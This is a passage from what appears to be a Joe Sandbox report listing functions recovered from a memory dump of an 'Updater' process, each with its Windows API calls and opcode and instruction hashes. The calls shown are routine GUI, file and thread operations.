Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 92e2613076e7d048a04e038e5dd9da23c40c9f661b820a8118c9de037a6aa747
Instruction ID: bb34c3beecbd24431a98c172aacad9c7dbb18a7a3ad14ebf1f2adc44a1fbee14
Opcode Fuzzy Hash: 92e2613076e7d048a04e038e5dd9da23c40c9f661b820a8118c9de037a6aa747
Instruction Fuzzy Hash: 30312630A40608AEFB38EA75CC05FFA7BE5EF45310F08429AE495961F1DB788945C7A1

Function 00BB803B Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(01381E48,?), ref: 00BB8061
GetWindowRect.USER32(?,?), ref: 00BB80D7
PtInRect.USER32(?,?,00BB9573), ref: 00BB80E7
MessageBeep.USER32(00000000), ref: 00BB8153

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: b8980c7f9ed036a881b8f64d2b0583646e4d3b1cf97ef00d2a9361677db5ff47
Instruction ID: b9466993b9c4a2137f763974405bede1e0b1b6aa38cf7ee1abf864507ad48143
Opcode Fuzzy Hash: b8980c7f9ed036a881b8f64d2b0583646e4d3b1cf97ef00d2a9361677db5ff47
Instruction Fuzzy Hash: 75418E30601218DFCB11DF5CC885AF9B7F9FF49310F1481E9E915AB260CBB1A842CB50

Function 00B8EDF0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00B32306: _wcslen.LIBCMT ref: 00B3230B

_wcslen.LIBCMT ref: 00B8EE26
_wcslen.LIBCMT ref: 00B8EE3D
_wcslen.LIBCMT ref: 00B8EE68
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00B8EE73

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: 9f0cfacc0f433f1aa4cbccaffc886a9185efa49ea2f35bea61efde05b3b062df
Instruction ID: f3d418ae97e63eace5c785c12327171b3e65cd4edca0b01fa58dc3bc12c5add3
Opcode Fuzzy Hash: 9f0cfacc0f433f1aa4cbccaffc886a9185efa49ea2f35bea61efde05b3b062df
Instruction Fuzzy Hash: E421AD71D00218AFDB10AFA8D982BAEB7F8EF55351F1441E9E904AB291D770DE01CBA1

Function 00B803B2 Relevance: 6.1, APIs: 4, Instructions: 84windowCOMMON

Download Yara Rule

APIs

TranslateAcceleratorW.USER32(01381E48,00000000,?), ref: 00B80422
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B80466

Part of subcall function 00B359E7: IsDialogMessageW.USER32(?,?), ref: 00B35A21

TranslateMessage.USER32(?), ref: 00B8044B
DispatchMessageW.USER32(?), ref: 00B80455

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Message$Translate$AcceleratorDialogDispatchPeek
String ID:
API String ID: 1911789232-0
Opcode ID: 79c26cad1d417923fabe9ceaa2050bacf9ffdb3d2888fcdc281235a190604532
Instruction ID: ecc789991a20888fe96ca1619a5164f2879a1b1904964460b6889dba947134b2
Opcode Fuzzy Hash: 79c26cad1d417923fabe9ceaa2050bacf9ffdb3d2888fcdc281235a190604532
Instruction Fuzzy Hash: 0531C4705A42428FDBB1BB74D844BB237F8EF15384F180599D566C36B0EA79948CDB11

Function 00BB99F9 Relevance: 6.1, APIs: 4, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B34E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 00B34E6B

GetCursorPos.USER32(?), ref: 00BB9A33
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B78560,?,?,?,?,?), ref: 00BB9A48
GetCursorPos.USER32(?), ref: 00BB9A92
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B78560,?,?,?), ref: 00BB9AC8

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 712ba1f1dbbcb7bb86fdd47207ee492cd3a07dfbc5fab72938b0b688f11ec11d
Instruction ID: 3421ddfdd39eaddd74f1fa235d4e38f9f8d1e7d0a899c68789dc4708e24baf92
Opcode Fuzzy Hash: 712ba1f1dbbcb7bb86fdd47207ee492cd3a07dfbc5fab72938b0b688f11ec11d
Instruction Fuzzy Hash: 9E215E35600018EFCB258F98C858EFE7BF9FB49710F1441A9FA0957261D7B5AD50DB90

Function 00B8E098 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(74DF3340,00BBD934,74DF3340), ref: 00B8E0D2
GetLastError.KERNEL32 ref: 00B8E0E1
CreateDirectoryW.KERNEL32(74DF3340,00000000), ref: 00B8E0F0
CreateDirectoryW.KERNEL32(74DF3340,00000000,00000000,000000FF,00BBD934), ref: 00B8E14D

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 1455239df5019a1e92d29477585113aafecdb8d88acc89bb31e4ac3adccfceb2
Instruction ID: 5a2573fe1046624ac94a5574610f31d5cd1026a436feed53906d3963d72b27ed
Opcode Fuzzy Hash: 1455239df5019a1e92d29477585113aafecdb8d88acc89bb31e4ac3adccfceb2
Instruction Fuzzy Hash: 912195305083129F8710FF28D8858AB77E8EE59764F104AADF4B9D72B1EB30D946CB52

Function 00BB30A0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00BB3128
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BB3142
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BB3150
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00BB315E

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 06391c0e6bb2631ed9c7cd9578315813fc850d15e239204dc21f0bb0932ae096
Instruction ID: 6749a54824a3d7a7401bda183be0eb428c883ad00d8736004e130834629aa414
Opcode Fuzzy Hash: 06391c0e6bb2631ed9c7cd9578315813fc850d15e239204dc21f0bb0932ae096
Instruction Fuzzy Hash: 8021C131204511AFD7149B18C845FBA7BD9EF45B24F148298F42A9B292CBB5EE41CB94

Function 00B887B9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B89C5A: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00B887CE,?,000000FF,?,00B89624,00000000,?,0000001C,?,?), ref: 00B89C69
Part of subcall function 00B89C5A: lstrcpyW.KERNEL32(00000000,?,?,00B887CE,?,000000FF,?,00B89624,00000000,?,0000001C,?,?,00000000), ref: 00B89C8F
Part of subcall function 00B89C5A: lstrcmpiW.KERNEL32(00000000,?,00B887CE,?,000000FF,?,00B89624,00000000,?,0000001C,?,?), ref: 00B89CC0

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00B89624,00000000,?,0000001C,?,?,00000000), ref: 00B887E7
lstrcpyW.KERNEL32(00000000,?,?,00B89624,00000000,?,0000001C,?,?,00000000), ref: 00B8880D
lstrcmpiW.KERNEL32(00000002,cdecl,?,00B89624,00000000,?,0000001C,?,?,00000000), ref: 00B88848

Strings

cdecl, xrefs: 00B8883F

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 4b47227b73e5fc96a2c44065e5a8f6b0f9000fdbcff28287af3f942d4c63b257
Instruction ID: 85dcfc94989d3e73f13110e58668a48b78ae0f5f7007a83f429d58e264d10fda
Opcode Fuzzy Hash: 4b47227b73e5fc96a2c44065e5a8f6b0f9000fdbcff28287af3f942d4c63b257
Instruction Fuzzy Hash: 4711D33A200342ABCB14AF39C85597A77E9FF45750B90816AF906CB260EF72D901D790

Function 00B82B43 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00B82B63
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B82B75
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B82B8B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B82BA6

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: dc2c32ab0b213ed44eacc122c17654b7c2eb2f21b120e212a8d79d7c14c53629
Instruction ID: d5ce60c3b6414eb9102357f3f1558a178e49c17a0f38de9075a18d713a94f7df
Opcode Fuzzy Hash: dc2c32ab0b213ed44eacc122c17654b7c2eb2f21b120e212a8d79d7c14c53629
Instruction Fuzzy Hash: F111F77A941218BFEB10AFA5CD85F9DFBB8FB08750F210195EA04B7290DA716E10DB94

Function 00B8F018 Relevance: 6.1, APIs: 4, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B8F03F
MessageBoxW.USER32(?,?,?,?), ref: 00B8F072
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B8F088
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B8F08F

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 9132aec9a98b78f9bff6f05c1c4ce8dc8e2908bbb17b877f7b360ae422c2f0e8
Instruction ID: 4dccda3cdddcebd3e0936f646ecc8f96a3f126042c6eccc891af81c1bae8a7fa
Opcode Fuzzy Hash: 9132aec9a98b78f9bff6f05c1c4ce8dc8e2908bbb17b877f7b360ae422c2f0e8
Instruction Fuzzy Hash: 1D112FB690425A7FC7009FAC9C099BB7FECEB45310F0443A5F814D3291EAB68D00C7A1

Function 00B34ABE Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00B34A7B
SetTextColor.GDI32(?,?), ref: 00B34A85
SetBkMode.GDI32(?,00000001), ref: 00B34A98
GetStockObject.GDI32(00000005), ref: 00B34AA0

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 4707e345baf01760927a65fe6134126e5abad64dc8f51f0c640ccb4557f40ee5
Instruction ID: e298d5740e698ec8835c44205d2cb9d51e2fdd03cab9605caf67ae6dd3180b4f
Opcode Fuzzy Hash: 4707e345baf01760927a65fe6134126e5abad64dc8f51f0c640ccb4557f40ee5
Instruction Fuzzy Hash: 8B01F5312C4740AFC3208F74FC0AAD67FA5EB52330F14479AF6AA8E191DB7909418B60

Function 00B4D06B Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00B4CE98,00000000,00000004,00000000), ref: 00B4D0B7
GetLastError.KERNEL32 ref: 00B4D0C3
__dosmaperr.LIBCMT ref: 00B4D0CA
ResumeThread.KERNEL32(00000000), ref: 00B4D0E8

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 42d20535754c4cec5ebf1eb50d4bdd7a36856b76f6dc984681ee38eed29be94c
Instruction ID: ae1ca39cd91570dfd6a3244e0c7eb95d0a47094d1f0e5e508d01f37d82cea1e2
Opcode Fuzzy Hash: 42d20535754c4cec5ebf1eb50d4bdd7a36856b76f6dc984681ee38eed29be94c
Instruction Fuzzy Hash: D501B5325012047BDB216FA5DC15BAB7BE9EF81731F204399F924972E0DF748A06A6A1

Function 00B8F6C9 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00B8EC33: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B8DCD6,?), ref: 00B8EC50

GetFileAttributesW.KERNEL32(?,00000000,?,00B8F417,?,?,?), ref: 00B8F6F4
RemoveDirectoryW.KERNEL32(?,?,00B8F417,?,?,?), ref: 00B8F70E
_wcslen.LIBCMT ref: 00B8F71B
SHFileOperationW.SHELL32(?,?,00B8F417,?,?,?), ref: 00B8F759

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: File$AttributesDirectoryFullNameOperationPathRemove_wcslen
String ID:
API String ID: 3674178553-0
Opcode ID: 01d773d88021c96db1526728f9b4c9ead31e477dcbcef8ca11ea81ddc4fb7334
Instruction ID: dfcade5d04489187996dc4fba387111202b3c27610398122307333f57d56e7d1
Opcode Fuzzy Hash: 01d773d88021c96db1526728f9b4c9ead31e477dcbcef8ca11ea81ddc4fb7334
Instruction Fuzzy Hash: D4114C71D0420A8BDF01EFB8D945AED77F9EF09300F1405BAE419D3291EB78D6848B50

Function 00B34570 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B345AE
GetStockObject.GDI32(00000011), ref: 00B345C2
SendMessageW.USER32(00000000,00000030,00000000), ref: 00B345CC

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 731ab6e64808ce4a20e24f70c8d0ed060d105caba3e6dafa6b1d3496873cc813
Instruction ID: 6fff00242e5e4bf38ee5fa16f6c777e0e78805722a67404493a9f9fb15119b74
Opcode Fuzzy Hash: 731ab6e64808ce4a20e24f70c8d0ed060d105caba3e6dafa6b1d3496873cc813
Instruction Fuzzy Hash: DA11AD72501959BFDF124F949C44EEA7BADFF193A4F150251FA0452060DB75EC60EBA0

Function 00B8831E Relevance: 6.1, APIs: 4, Instructions: 52registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00B88339
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00B88351
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00B88366
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00B88384

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 86eab43c77c3ad9cb2227ae212bd9806a59d7a4670ab2f3180e62bca5b151586
Instruction ID: a82bbc46098ee25389f1c10ba1833996be46d8c0584c10498e5e743c54fcd61c
Opcode Fuzzy Hash: 86eab43c77c3ad9cb2227ae212bd9806a59d7a4670ab2f3180e62bca5b151586
Instruction Fuzzy Hash: 8411A1B1201704AFE720AF54EC48F967BFCEB00B00F5086A9F616D7160EBB4E904DB90

Function 00B52F4A Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00B52EF1,?,00000000,00000000,00000000,?,00B53162,00000006,FlsSetValue), ref: 00B52F7C
GetLastError.KERNEL32(?,00B52EF1,?,00000000,00000000,00000000,?,00B53162,00000006,FlsSetValue,00BC311C,00BC3124,00000000,00000364,?,00B52D1D), ref: 00B52F88
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B52EF1,?,00000000,00000000,00000000,?,00B53162,00000006,FlsSetValue,00BC311C,00BC3124,00000000), ref: 00B52F96

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 19165a0bc1e49dbcf0294c4bca472eee35708a78278a402bc5211b046b2165e2
Instruction ID: 8132b388c61a3a456813d0c659993df2e0b64bcb0a0d938496dfeb7c073bc082
Opcode Fuzzy Hash: 19165a0bc1e49dbcf0294c4bca472eee35708a78278a402bc5211b046b2165e2
Instruction Fuzzy Hash: 9B018832616326ABD7214B79FC44B5677E8EF4676271107A4FD05E7140DB25DC05C6E0

Function 00BB87CE Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00BB87ED
ScreenToClient.USER32(?,?), ref: 00BB8805
ScreenToClient.USER32(?,?), ref: 00BB8829
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BB8844

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 7f67b2c40f06efea2a10f26680fd5fe0ad7c17e66e92ca00156ee3efb1642f8b
Instruction ID: 0181480ba1e199a93216cb467656644cf824e5e029751f67d62a84eb924dfbcb
Opcode Fuzzy Hash: 7f67b2c40f06efea2a10f26680fd5fe0ad7c17e66e92ca00156ee3efb1642f8b
Instruction Fuzzy Hash: F41132B9D0020AEFDB41CF99C884AEEBBF9FB18310F108156E915E3210EB75AA54CF50

Function 00B84DB6 Relevance: 6.0, APIs: 4, Instructions: 42windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B84DD0
SendMessageW.USER32(?,0000000C,00000000,?), ref: 00B84DE4
GetParent.USER32 ref: 00B84DF9
